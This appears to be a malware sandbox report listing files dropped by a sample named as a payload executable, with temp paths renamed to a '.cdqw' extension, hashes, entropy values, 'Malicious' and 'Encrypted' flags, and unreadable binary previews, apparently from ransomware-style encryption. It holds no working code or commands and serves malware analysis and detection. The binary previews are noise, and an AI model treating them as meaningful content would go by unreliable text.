                                                                                                                                                                      Preview:MZ.....M.9y.@.....5..M....T.F...siY.%.........X;.6^...[.R..|.....G{;.v...WX].....v..S>....9cY..!.73.q~.Pr..Z.<$..aO.....Q.\.P..$.I.*..B....4u.3.W.g.)W4..g\....K........cP.).-t.........+-...*X).P.l9:....>R...1......|m..3..m]..3...]'.....n......e.kV?....._..._.z....)&L...k......._.p......g.....m..{#=.....S.,.V.tl.cT.....w_al?.p..LpN.A.Z......cWdI..=,-...h~0.r...3.f.M.p.?...X..h2.9.L.,..#<8....W....Po.v4B.q...M.9.S...3.y.......\...q...;I.Z.....(`.?P=.7.}..w........9..#o;...0.H...J.u.C...}.....z...i.S.`..%.....N...h.f.d+..4...s."[...Y.{<...L..)C...?...%A.F..Q..q.;.K.z.'4....G:.:.Mb./C5C.[....W?..S......%......tA+..p.....'...i..n.:~...l..3'[...7s{.Q.~.W(...._..g.;..".gQ...}.w...1].*...8b....4@.4Rd?A.Q.U.$Z1...l.@}V...{...i..9%!..k.70..A...t......>.....W..".;.F.G...T+.....A ...r.Bk].7..xn..)"Q..]._.....T..`.,...[..D....{.)..lt...Xv..X...F#e...K.!>L.g-.[|2..a....Z.C...E...o....m..H7..Y.nq^q.....\..A.;..._...........5.l.. ....R%.....}.....]........;.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct443C.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.9973360230375885
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:Irm+kbCdaJ07MpZ3txMfrSEnpbQboZZ54T7muF/3/Ae:Ia+rdai7oZ3zMLp8O+L3/x
                                                                                                                                                                      MD5:833F127D60D70FA87D8C25106C33B238
                                                                                                                                                                      SHA1:829BC64EC4B43311BFF1491F099BA1F6585888BD
                                                                                                                                                                      SHA-256:8B55287CCB43AB284610F070B8813C8DC0861E9C0F1114CCB6932EE262FE4710
                                                                                                                                                                      SHA-512:856F651585DA0EB2A149AAEE675D20569157F5F4EE1AF992AAC865A78C6E2FE2568D58B3E0E555C865070B5C3F432C10E7562C535B8CDEA552EF09CBBD564D83
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram;.#m@i.....gr..R=z..?..#a>..n....0.y".t.K..FI...G.3vS..m{.[.O.....}...v.V..IgW.z"7..o"...../...<h.[(.K(.X;..<.2.y..k....G.d...rJ,.N7..$@...z.M.4../..M....W...(.~..3....O0:.b.?-tL_..Z=....R...a...!.&."=....N.S.^.='j....n.a.:m..m..k]n..zhy.....u.0.]r.I...{......z.}..aB4..H....q.....&G..~..X..1.{.W..FYG....}.b....v\.c.........b.y.l}.~...~....%(.....e....'.e$.KJ.......1..p.'..........HI.........B... .E........YBy..w."...u8d(M....@r..fZK.-"....#.m$.....A..........\....6o...).........<]..u&.c.....K....f.kF..m..%..C..8r...D..p..uJ_e..^..... .:......T..>....2?g.o3F.vg+.....#....J......\..T}..6.......3......[U$.....J......oK....<......[.t.31<........m.c..{....`.e...CMU..1..cf...99.S..F.....Z.a.>8T.......T%.&qi#n.Y..e).Q,.F>veS.......s..e.d09.."}.U.@.|.. xl.u....B.,n.F@#>&..>...?......GW%.C\V.../..H../,^....u...P..\.?.....A-..f....k!.8%....q.1.r.1ei..zVr"..&....6%.&.'...Y.}vB.\...,x..u.%..ki......I..b5Vb'......:t7M.I.L.f.^.h....r.qj.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct49A7.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997269298719015
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:1qoQ1g/PUZVijg/q6GhyFiXWHkyBYh4peoD3CV:aZVijzhDwCmM
                                                                                                                                                                      MD5:23AFA38672E5306295BCEC4CFF8F2FB7
                                                                                                                                                                      SHA1:5F60D42ADF89E69D0A2161686265EE6D508C596C
                                                                                                                                                                      SHA-256:D571222A65C88CF195C3F1BD2BE6F3B96E1F9098129A6D21F3A94294F25960EA
                                                                                                                                                                      SHA-512:92882014E5671634BBAF08F0DA7514B99D0A0102E1284E52289046E5C2A88AE970A1C74B27D8F9EB1994EAA4E7686E0019DD99CA3E65AADBE78F1A8C824637C1
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram.g](.D...`..sX..yg.u.SLI.....].C.?.H...98....IF..=c5X..>....|..A.....?..j...e.[......SD)_.76AYeh..Y"R.. ...=...i.b..7X.*Q.-..n3I.QT5.{y.s.....K.V.m.....9s.!E..{wQ.a .*;y...].....[Q..a..E.Ld..vq...M..J+....W...].;|3LV.c.~4.6....k.1#.... .]O...@. I.x.!~...5~....."7...s.o>i.{F....>..haTS./.ni.H..A.f..E.g.;..X..k....].uk..us.(.-..WK..........Q..&.e.B...NR".2k37...n.U.5..3.&.p~.....&....d84..9....U..c4.h+...1JlN...N..Ii..<.a.k....{........NK..]f..=H.........%.5;..............x.la....^G.U.....b.9.#.H.!NL.G...A.kU.-G...J.....sg23.bn..Rt.Y.8......W~...-......s.H..S....t.@...3o..j.Inl.T........2..#..C[.....FE($5D#...'.2...v7....... ..w.$....Fm..&..*......_d .\,Y.<....K..1.I..a1.1.@A..d}..4x..6..J.eX.S..=..j.c....dy..1..T...W..7...E5R.f....jO...h.<...iDE.....1.J.n....WB..?...g.Y8.%.f1.M$.v..|.Y...=..I..J+A.y.d.g.Z....WY.......)g..^...`;d..(1.KRQXt..7^%,.P..h........m.CN4.......E4j..H..S-QYR..gP..h.o:....*Z...l}]@.........V..qT.H..[r....H

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctAB5F.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997262806942996
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:R69DpP6GJBaAqZRKQ4sIs1GuzbZrd1XYZr6aFwMKM16ZxvS4C6wB4/C:Gi8BaZZRKfsp1GuzbNd1XIkM16bvbcoC
                                                                                                                                                                      MD5:A657D9DB1213C7FFB33358E0ABF32E43
                                                                                                                                                                      SHA1:EB88D4D73B258EFD38CBFD92C4C797A0E7776707
                                                                                                                                                                      SHA-256:7D988E7DFC771DDA2481502AA102BCD7EEF11534D38B9405D50A872FC907681B
                                                                                                                                                                      SHA-512:5CC6DEA85B26C6ED599232337FC5386B1496495B9CBB5D01CA9F9B26235C6CA2A27A3871FE988DD319F0B4647AA933DBA79F69ACAEFA73F8B3C0FA95515088D9
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram.."?dt@n.s...6....cz.p.L..3....o6Yp+..U;q.9..../#v....h.K.&..6Q3r...i4....x.+..Z....'E .......a.t..vE.p..\p..B8...Y.[.R/........C.....4H .F...RGN...G.<....O.\. P...(`eYl"..._..A.y.h_ ..R..."j......r...?.N.2...l.E.......:.3.....?..3..5G.....R...G.......x8{U...T.L)....3,H..J3.@.D....m....)z...0..&W.S{.z..!,.).oJC.5..).8..6x.nO'~.W.?....)]....fte..C..4..u..W#}..|.5tlS.e.....Z.L.HkSF.>..}.......~O.d.v??.........).....".7..T.........`.k9....8....x...2.:..a..>.....6}.t7..L...?ob..:.$.-....;.!?.<..n...An2.F.w.D..!:...D..~n"K.......FJq..`....f....qo.#>..W [.&.I....Y0...<.T..P.>/.....z[cJ\......b....A.3.._...H.d...]_ ..Ua.]x.Dg]..jA5.6.g.}....".y]..............7=.D.t..Z..A....f;.r..u..^....A.2...../.W.~.z....i..........9..7..O..q../.j.RF......x...3..,...8.).\.pr.q].V8..;.:.\..^.i[.`..D.1&[..x<...e..m.VP5.... .3b.I.pk....4*7.n.u.../1,.m...$.Y.B...Q.......:j..ce.h.i........(.v....|&.v.....1......hjn~....c{.....'....>.'BJ.bN..e..G..N.}....qe..{S<...C

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctDB2E.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997096675159365
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kUoQic0SAV/2T50IV4QbwHqkXpbrj8yCQjzuRhvOO:Wc0SAcWIV4prj8w8l
                                                                                                                                                                      MD5:B473D3EF1AA4AB1EACC6D64885F53020
                                                                                                                                                                      SHA1:76A96E04E7E384AFFF919F470C5A417E709704C0
                                                                                                                                                                      SHA-256:6FCF3B6200C166CB830DBD2C74F2E202E48C20D9F02ECA2CF399F17297B980AF
                                                                                                                                                                      SHA-512:FC80BEFF467A376107C9D7FF8804F84F628ACBAE2DC38B3AABD03BEBEFBA561A8F94474DC3F8FA97BF4E00079C1EE62199F62C85149EA19FB8A2203F5252DA26
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram0........I.^.....4...........M...Jn.eB..-.c....U.!1*....D....A.E.G.w79h.<...k.a....:..7....3.K..{O...."K....>?......../...A....w......6.p..X.Q...1.7..f..4.....!.%I.6./\{..%@.......a$.E+....2{+..j.......k....5...E.'..j.*...1.....'..>..o..\..h.E.w$].$\7"W>..B.n:g..f.o..F.[....5\.[..K..m..4.....x...3.H...N.B.5H..C.0.b....NO.xV..>.s.B).....}.B....C(l.RX..B,..37|..I'..6.Z.. D....{$1D.[]H..)k../..G>S.>Y.x...(...+..^...oL..$1.?wAz~......B.Pc.)K.dI.E/.j"/.T.....3.......(....:...].^.....?..cp...p.6...b..>o.....cs^..".|....eA.....\...Gw..fz]..q.. .qu..e...-.`..u..l.i..f....A.T.PU...Q....n.D......~,..S.7+.....|P.|.H....2..Wf.../.........Rx.Z3..*..t..gT9.".l.2._..m....X(..ttv..K....rv.Mp..t..L.:.G..%8...>;..0...(.;J.7..rT0.*.0"..r...5.....Y..=Rj..A.;%9...-..M..X..q*....-...R.TI.....k....?.....O.z....jr.....Z.. .l.`......0"...[.aE....^jx...<W/..X..qye.T..ZoN.?.....2..{..B.a.=yz......kz..._..R...3Kz..'5..M..q|...Qe..G.....H..%..e...I..1.F+.S.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctE4A4.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997584614740485
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:9l45XdGE9ETBDUfx/D9BJFzCxUUZi4KT3mjOTnxZKvHS9oGVJa:9lwXrEyfV95CLKT3mjKxYaoCM
                                                                                                                                                                      MD5:89E271A948FAA15DB9E98B18625D202C
                                                                                                                                                                      SHA1:FE79D1C277507BF71D2B56D4D6CBA319BBE8AA24
                                                                                                                                                                      SHA-256:FF96A9E9DC3781F70C35F9BA378B7D3A7119D837001142F4D4BB5D77D1859275
                                                                                                                                                                      SHA-512:822C8605C85D717306DF796F821EAE8417CD76BE3D77B4C60F9B526D484C12E23075F8622A69377A28BF07F083FD8B482A8121BD09A6DB7A754B8881FF00874A
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram"f*i...vxYR.%..>.B...N=1....w.Fu.f.3!...#?9q......-F...|.@c?}F.i.u..}Z....QVa.qz....B...U.....:..NX.k.....'.......l.+D.gH..Ru.c|q.U...}3-..+$c.q..jY...d.dyG..........`.;..|.5U..]..2.....SZy.3.}.r......k..3.....6g8..W.)S.X|.Z.../..2....p..'.L...H..Gv.....Kd....G.....sC.%..(NIm.b...\1..&..T..x.......*.1HE.R..&..........p..-....."..e.....~z..M..&NBqn4o.)hsw.e$!F.`....O.'nve...Yz^..7mH...I.b..dfl.eu..`.t hg..X3....`6...M.....9Z...Y.p^..h.,.;.Dk.C.| ...]0..G.|.a.....|j...RD.he..b2.......].u.K.g....(....M....r@r#.N.c.1.7.....JI..1.<.E/i.]...kI.....3.#.ss.K...y4,D.&Z9..'k..K.9~.I.O.,.:......,...n.....J......|N\.U.w...DZ...iFEm.\n..3.(.......8.b..4g..^..j........I5.{..........E.%...&..&...-6..j..e%..P...,x..|zK..a2.GDOho.}..7.....\...2J......$.....W...vy.......C.~..k...\.]60L.!|.K.T!+.U...B..!uz.CL..de.p...C........\p..G.Uf./...8N.;,....HqY...|.}.:n3...*.R.q...>B..o\...~...k..9.'.M`3..H..%.B..m..eC'W[.....`(x~.rJ`rrSr9.6.........g...2!N..

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctEA40.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997211347285652
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:NeutngY44Ex562cIs7KbZ16KTGChrTXH/yNVnKbyP7CAe:NeCgY4XSI1EiXH/yNqg7Ct
                                                                                                                                                                      MD5:DC4604A65C5867D089BFC4C9848E9B53
                                                                                                                                                                      SHA1:4A4D1352F24CE3F9D1A76E47A814C0F42E494CF0
                                                                                                                                                                      SHA-256:9A5922697B5EDFC4E3A1A2D0FDBB1539ABF346CDD6DC56FA63E791D882BC6701
                                                                                                                                                                      SHA-512:EF7F6C1314BDBABE765F72B6D96C2C6AF9B5F06DA7A8CB55514AF1B04399829A6DD3F95929FA12513AB575F3C1998ABCE4BC8431FC05724AB8C235939E54BFE6
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram.Z..`..<h.........y.:EL..."...u.d.....5....4f.E...b.-{7td.....,3.....}.Ci+\.}.9......8.Ve.QJ.....~!$.2.on..|..x..qDB...X/..Sm.....1...}.F%u....'(.X.....%w{.,..hZ..=ch.H.ne>..U.....h(...V6$.../...Y-...\.M.?..S....>..#........k..E.C..I..'.....s...B._].6.9.6.{..........}I$m..}...H.S..w..Z|6.@....:7.$.=...$.....NY...k;...y.~..Z......~..6$._g0.A..m..Y.!..)........:..w.[|.......f$...8.....l..FV..]~8..A.. .Pn....XH6H...{..M+..%...<O7.....-.e...V...:5^;g..:-.....@.....)Zr.!,..n..z>.....q....OBl.7W.P.....l...**...".Y........Oa_..OD<......t..2....(..#..7.\Xx...Oe."..9.F...........q8.O...M...F...^..Ui..5..%.....a._.P]...F#.63..s.d..W........k.A.rJ..Ex.#,^5V.........V..t..K)......J.S..c..!.F.C.....^.a......CyS..f"......J.?.......'d".W...|R...7.[....v*csc-e...=..das...2......N#=.T....b.:....U.6..m-.h3.G..:,0$.B..1n._.....='7.{.R...8.Q.Wt.jo.i...v...A.N.e.c..6`..-..O...RZ.\U.[|..8.$cz.[.GH.eFf....?.C..f"=k..y...k...u.&WzX.y.....6$....h..T

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctF411.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74525
                                                                                                                                                                      Entropy (8bit):7.997810212418462
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:dQVdBjEXV27bw36SEYandD5SzLLHFzh6Cl83TO9BE/0Zb8hhSv:mV7El2703XGeLHLH2KvE/0Z4Mv
                                                                                                                                                                      MD5:ADA388B8B0776F416D3F21C1F5569491
                                                                                                                                                                      SHA1:545F0BBF095646D5BE9B81546DB602CC2E6342B0
                                                                                                                                                                      SHA-256:B9BE681CD4E39976AB3D37FD078E8CF624794DE44AFFB8ECE343614FF51B72C0
                                                                                                                                                                      SHA-512:5DD9DE45C3828949BB1A522FE8E1A9CB559677121B01120A42C0240A71BEB8672773AB7AC9EA0FDA57D1091AD21255E7D32BBAA64977798C43CF2E2F602708FD
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ramg.........R......{......}.......Z$eg^....I..`.......s^L.....&de..)R......_LF."V.n.....t.u^r..4..X.....i.....u.._...1.!...9..}.d...l.I..;.....2C3F*[zu.|.Q.9b(.r.(...`,.ed...o..f...}.Y.....W(.#.p.....Xu.c|..I.C....H8....U..$}{.~.7.v..f...K..K.#m.ep.n...at.-E....G..S.C..su...j....i^.....~.......L.9._#..!.,)[.:j.4;.a...6.qkT..#.9.[^z...H..q....9...7....+h"..q.B.8p.D[..}K..... 2.....1..b..e|...>6.X..es..8..!.......h%.V.....|..6...tw..9K.x(M.eR...~.I.........GV.......-.K!...yt..#.....k......,!..l.....v.D..C......].....,....@.v.>Q.^.w..Ccu..^.1..;Y<.....].iD5/..|."fB........$(..b..k...........[.nsxs..:....&..Y..9Y........qU.'N*.H...S"../EX...5.,F..<..8...J{WL..(..X..MsX.<./6..Yv/R...%..52.R...i:.t.Co.N..z..(.|...cEup.)F.]L*..Jv.$..].... ....?....k...N...:i.{:...kjN.h..2:....g.E..K.3T.........h`{...S.J..8...X.".....uf....$.H..Z[.a..$.[49...[;....4...<........O.q.....T..?V.'.{.j....Ac.r.)i.(..n.q.....K..[8.6.F..hgl..u.o^..U.... .@..(F../...ED

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wctF86A.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):42164934
                                                                                                                                                                      Entropy (8bit):7.947669527692684
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:786432:HwQNeYDxVRrMPJy7LVV4NDDmdrZy9wOtg5gGOdjtjSNu4GIluUNj56I59N:QQcWxDMPnN+dk65gGUjku4vNjLjN
                                                                                                                                                                      MD5:A63E92C370B5B7528B392E48BF4AFF8B
                                                                                                                                                                      SHA1:84015AD81D6FBFB6157B57224A53EF5701292189
                                                                                                                                                                      SHA-256:2AE4E9F6E540AD0A1E58F09E54C6E5687EBCFA28C3CE7C80D10E673C96E7C8CA
                                                                                                                                                                      SHA-512:F8B45EDBDA434BA8059FE808A1A82BFFF1A4B078ED3E37AB4A6BD6D7862D6D58A29B5856019B09A19A2AEDF7B7BF9FC28499C4508131D51CCD12EF3DFE09CD75
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ...*.v...w.$W.7.&6..7..k40.p....3k*.ezqG._T......?.}]......q.B.l...Q.......JE..K....M.......oJ...E#.b....mb..@[`.MH... *.x..E....l...T.......R...i...Lt.M.!...R...._.?R.e.C^l7yHo..B....>..<.!o..4...k.#}0.!(Z...tu.K.....8n...&.p.v.0b.......m..G.....V<....3Q5EY~..b..u$.E`....h..S.[.....k([....t..k..+;..Htd..'...=...]S.....2.,D$...sQ]..=.07#4..&.x.c...*....oz0.<%8..;....5..q_O...>yH.s.z..?:.6.i.u.N+.2....'..I.+.u7.......l.J..B..3n6R[...;E..g./.)..gQ...n.$N.".=F.d,.[...|6 ..t0....i..9d]....X...G....Yk...3.i....-.s0.D9)i..o..i..w.L*..L."v._R..w.$}..!.i9\sI..t....g.?...y.Uo9.3.H...n..W..x...T.`....WT..pM.b....lK............'..O..z.....u.5.. .../...-...........t.Z..nwC.z.b..R6..~...Z3.D'.'.._L....P.*.|....#..Pw...........[=mI..=.E)X+..\.k..W.K.r].RkC....6.-......j+..'GQ`Q.c..k....qr.s...o.*..K.JZ.Nw%....@.?..x..U.KD.h..C....{....Ug...$._..F/..=..E.x.....p.D..;.1T......H....J......A....f.K7..c.>^..d-... dZB....u.FTGn..Ue........pI;..{.,`.7...i..

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wmsetup.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1031
                                                                                                                                                                      Entropy (8bit):7.7700730740248884
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:twOexkBe2Pcal3WJEF8m33V+KvKFMLe42bD:qufPcgGU8m38prD
                                                                                                                                                                      MD5:AF4C389B634FECB5BFC56BBACA41F0DA
                                                                                                                                                                      SHA1:02462F8123CF7AA9371772CC631A18C4D5DCCA24
                                                                                                                                                                      SHA-256:E6CC9249F58EBA2D790EE3DEC96D1256C7F9ECE83CC71FDB11C95EB7FBE7E6B8
                                                                                                                                                                      SHA-512:424D6EA0033A7F281B96E6E8697ED6F45001E534E216BE9092B6954D0FB5A0B43EF813661FB1525C211BEAFA33349FBAC248C58D7BF552D85D5B1B6DE9760F00
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:..[*W....t.P[...#.g.......T.^F.L........8...h.Cn...N.......}..hF.+Y..._......Z....G...Q...m..r...e*Z.>.DL9..mC...~. .{.Vc>.N...c7.C....|f@...nN..d0P...e|.ii/...._.P..v......b.D.....d.h....xn.@...}c.....C.yi.jgM..w....!}g.....CL.......uI.....w.......S..=,dV..z3(s H...az.........s\=.j_(.[4.k1.._..W=...8.~8..u..D..7...O....Y..k!ZOC.'.*..U.U;L...*1<n.T......R..G..C...M.G..B......k..6..O.z'..Kr...:..m}.f,k...F...Rv../..^.........P.0>..%._C.....ev4..).}...,.>j.M,k..!...+..Y.`e.....P..c.m.D./.....^F.Q3L.mFIjaZ.BbRb7...\:..be....H..o.....=..N-..g.AW>......*p]..%PF....E<.mR~....B..8..X....-..JO.IZB.:.P.{..u..<....|Q.\.J(.(.j..a......M.......j(3..n........J. .5..tI..).l.DC.t..p....@..o..........>..h..9..j..`*.!..x....;r...9,IK[.....h>27..Lg.....S...gD.....4 ..;.;.....:o\h..3...T....e.6.D.{..\..).u.xWY.k....O..Mlm...b...w.!...`....F&]x(..@...T..W.{j..#...i..F...g.|.j.L.0.b{9......_E.B...L.-.:....,........+.....mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\{02662522-698F-45B5-959E-0EC7B36298AD}.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.963935881177714
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:g8RFI7egUGgfsf8AWrCFBzu4AJlPbD1Q+rIW7jw6+uqJPHolZgyf8v6OJTzMJKGq:gEFI63fsf8AWrCFByvPzDvIec6hiPHoc
                                                                                                                                                                      MD5:7C4DD34C54710A9B3CBDBF1A8628AC5D
                                                                                                                                                                      SHA1:017E2A18B71F3128F6E4BC35BFE768C43801015C
                                                                                                                                                                      SHA-256:5C6C369DB0BD843F51CC92CA7BDCDB09CDBC01667AB0C5CB127E4ACF50695BDC
                                                                                                                                                                      SHA-512:74DB20C3F0BD778E56752DB0D45C5C2368CBC0955ED2DAE1103A329A0001BB7903DF180A12E725CFC523BA13EBFC996EBE4B809F974F6EC9CC900A6BE6046C90
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG.p<....-...qj....8.(...U..O.MHV.#................Y.-....s.lT.D.;.._/...];...+.4...m..3Qe..0y-~.^..R.m)...rOt.d.`.y.Q..#.....`.....z3yi.dz./:!k.Al.? ......f.p....._J.(|..d....\....y&..".<E.......+.]uJj...@.G.xlwx..#.-#."...... ... k....X..)...G...ln.............]......Rp...!..=..J....i.n..FQ.....^.^.HL7.[C........$.]..I..._b~?O....-..&.WV......6.}_..$.$...x.(._5...J.@c?..'.1..`.vY`.........@.v....A....5.Rz...[......b..G.F.0."....E.2......?.<|..#O.o...8x. &..9.6.5.^..[:.....^.2eG^.....^OVK..i..#..z.w.)-$3 ".j|.aDE.o...mj...r.E...D.[.:.I..i....7i..)N.l.n...........bDTA2A%.$Z...'W...'H..Kb...H.oA.......G.F.5.>.o...lew.....KN....c.....e..)[#'%..OyG.......9-5t....[...I4. . 5..5...,L..Vv.....}....DS.....$.q.U.q..P...\8..,..*.......u..8.E...\..h}..v..M...A...,3..|./..-...*......w.k.. .....7.. n....d.(N.[....\M...M.f,.g.j...s.....#.T.:i...$.U%.r.C..P)I.p.....*..i..,.#\.........V.a.Z/,X.....R.t_.^whk.q}.55R.J..gL...>^7.$"0.*.....X..S\......6...N.2V.y

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\{139BFC28-947F-45CC-9DE4-AB0FCAEF6E9F}.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.968940637033909
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:PD1Yb/eyYeloW76IeAbUNHTAb4Gqvz+AY34m0RvSNhxH1T4x5f+c:P6b/eIUFHz+p0VG1T43Z
                                                                                                                                                                      MD5:9476D6CEBFD82873862A7ACBC0F466D3
                                                                                                                                                                      SHA1:90E9B443D5C9B749BDDCD7E609EACDDF9512D385
                                                                                                                                                                      SHA-256:F92CCFB332EBC70BE561D63E0D171F8539E49C483B15EB89A71CCB53CDAECA82
                                                                                                                                                                      SHA-512:378009B6C09993E4833E85025B3A181818C45E0CF50736A4138E25885ED1D079D2427AEE6CD0189996D81589B6E065F42C144ABC029BB6BAAF5CA6C0FE4B1035
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG..n.C.V.M.^.#.E`4!.....Q...3O|.l..U)|.... 7.$...I....W.6.~..D.Y#...|HOv?Z.o..v...J...F.....M.2h&..k.8.R.I._G.]....L..]V....Z..........B..8...x........K.1P.b. .....FaTcz..{....9@8..@.....%8.........w....O.c{..\.Rdp.p...!#...nV9Q<)}._.8.<....Tn.......X....t.u]....).Y..k.../.D)I.+.j.;.9.n.d0...y.3.(...x....3..&..#.X.}..._.z..5.6.)N-b......V*..4.".q.....>-.@..J..z.D..O..5...|....<M.|9#r.S....Vz@. |.o......S.!.o.wZ..3W.6.pU8.an/..V9(..#_.c.*.3.Y.:.}M.0...m,w........t....)..Eo..P!.?..A.c...w.........F..)O...f..T...W.A....u5.]q.>.1..B.)..id.._..7-....S...Kr...."." .....%[@.C..h.p......&..U......j..h..S... .]D..ds,...j.\s.h#^.#.......Dg1.....|o.h..P.t.....W....WM..U..>........-5.V.J...+.yq8k...7....V8..T.I..1..5-v.Y.:..3.ifU..1.)..up.f...]n.K....!.=.(.5Y../.F.{..W..Hi.~7"..5.Dn......*.\..{r....k4..............`....!.$..}YgI...w..V..U=2....$.....Y....5D....V..>..$F.*&,..z.8.....w.z".j...l..;......."L....<...sBH...BT..,.W.p.2zq=..8.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\{5871238D-BEB9-464A-931F-701C8F0FFB10}.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6130
                                                                                                                                                                      Entropy (8bit):7.971488518202093
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:n66e0qcdt/Uf7vywt7LHr3up7Vv0SUUZHT92mHiKrodV:Mcdhuvyk7rrIsSUUZHT92mCaSV
                                                                                                                                                                      MD5:C473DC53B0D72DE51F6F81CC50C9A1A1
                                                                                                                                                                      SHA1:1B385EE28B11D4DE14851414BC27E075D96D8B05
                                                                                                                                                                      SHA-256:A194AED24CC086A5001D29BC2ED51F8F8EE285C2005C57121C7A61AAAE523E61
                                                                                                                                                                      SHA-512:3550B53B519411DEA7376C6EBAF54A5E74587FD952F8743BAC2027FBED87A91A319443D6B7F330044E94D57DB109EC6F2DE25C9E1E773C68FAB3725B0B92D61F
